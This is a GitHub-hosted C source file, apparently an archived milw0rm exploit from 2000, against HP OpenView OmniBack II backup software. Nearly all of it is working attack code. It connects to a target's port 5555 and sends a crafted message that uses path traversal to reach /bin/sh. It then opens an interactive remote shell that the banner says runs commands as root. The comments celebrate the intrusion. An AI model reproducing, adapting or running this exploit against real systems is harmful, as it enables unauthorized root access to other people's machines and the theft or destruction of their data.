FilesExpand file tree

 master

/

1114.c

Copy path

Blame

More file actions

Blame

More file actions

Latest commit

 

History

History

History

executable file

·

185 lines (154 loc) · 4.26 KB

 master

/

1114.c

Copy path

Top

File metadata and controls

• Code
• Blame

executable file

·

185 lines (154 loc) · 4.26 KB

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

/*

* HP OpenView OmniBack II generic remote Exploit by DiGiT - teddi@linux.is

*

* Omniback is a network backup system by HP, widely used.

* took me some time to figure out how omniback communicated then it was just

* a matter of finding a bug.

*

* This lovely little exploit will give you a remote "shell" of sorts, you

* can execute any command on the system.

*

* As far as I can tell this thing is vuln on every Omniback I have seen.

* I've tried HP-UX, Linux so far, with diff versions etc. It needs some change

* to work on windows, but should very extremly easy, be creative.

*

* Greets, #!security.is, #!ADM#$%$#, #hax & HP systems for this proggie ;>

*

* - DiGiT [digit@security.is]

*

* I'm releasing this because it leaked and kids got their hands on it ;<

* sorry.

*/

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <sys/time.h>

#include <errno.h>

#include <netdb.h>

#include <unistd.h>

#include <sys/stat.h>

int sockfd;

struct hostent *host;

usage (char *progname)

{

printf ("\nOmniback II *: remote exploit by DiGiT - teddi@linux.is\n");

printf ("Gives possibility to execute any command on a remote system as root!\n\n");

printf ("Usage: %s hostname \n\n", progname);

exit (1);

}

int

shell()

{

fd_set fd_stat;

char recv[1024];

int n,i;

static char testcmd[256] = "/bin/uname -a ; id ;\r\n";

fprintf(stdout, "We have remote shell&%#$&%!\n");

fprintf(stdout, "\nType in any command and it will get executed.\nHave fun... DiGiT - teddi@linux.is\n\n\n");

write(sockfd, testcmd, strlen(testcmd));

while(1)

{

FD_ZERO(&fd_stat);

FD_SET(sockfd, &fd_stat);

FD_SET(0, &fd_stat);

select(sockfd+1, &fd_stat, NULL, NULL, NULL);

if (FD_ISSET(sockfd, &fd_stat))

{

if((n=read (sockfd,recv,sizeof(recv))) < 0)

{

printf("Connection has been closed\n");

exit(0);

}

for(i = 0; i < n ; i++) {

if(recv[i] == '\000') {

recv[i] = "";

}

}

recv[n] = 0;

recv[n-1] = '\n';

fprintf(stdout, "%s\n", recv);

}

if (FD_ISSET(0, &fd_stat))

{

if((n=read(0, recv, sizeof(recv)))>0)

{

if(write(sockfd, recv,n) == -1)

{

printf("Error %$#\n");

exit(0);

}

}

}

}

}

send_code ()

{

char path[32];

/* I dont care I just made test code and it worked, so #$%$# off */

write (sockfd, "\000\000\000.", 4);

write(sockfd, "2", 1);

write(sockfd, "\000", 1);

write(sockfd, " a", 2);

write(sockfd, "\000", 1);

write(sockfd, " 0", 2);

write(sockfd, "\000", 1);

write(sockfd, " 0", 2);

write(sockfd, "\000", 1);

write(sockfd, " 0", 2);

write(sockfd, "\000", 1);

write(sockfd, " A", 2);

write(sockfd, "\000", 1);

write(sockfd, " 28", 3);

write(sockfd, "\000", 1);

snprintf(path, sizeof(path), "/../../../bin/sh");

write(sockfd, path, strlen(path));

write(sockfd, "\000", 1);

write(sockfd, "\000", 1);

write(sockfd, "digit ", 6);

write(sockfd, "AAAA\n", 6); // nada..

shell(); // and the lord said, let there be shell.

exit(0);

}

create_socket (char *hostname)

{

struct sockaddr_in s;

int ipaddr;

if ((host = gethostbyname (hostname)) == NULL)

{

herror ("gethostbyname");

exit (1);

}

memcpy (&ipaddr, host->h_addr, host->h_length);

memset (&s, 0, sizeof (struct sockaddr_in));

s.sin_family = AF_INET;

s.sin_port = htons (5555);

s.sin_addr.s_addr = ipaddr;

if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0)

{

perror ("socket");

exit (1);

}

if ((connect (sockfd, (struct sockaddr *) &s, sizeof (s))) < 0)

{

perror ("connect");

exit (1);

}

}

int

main (char argc, char *argv[])

{

char hostname[256];

if (argc < 2)

{

usage (argv[0]);

return 0;

}

strncpy(hostname, argv[1], sizeof(hostname));

create_socket (hostname);

send_code();

return 0;

}

// milw0rm.com [2000-12-21]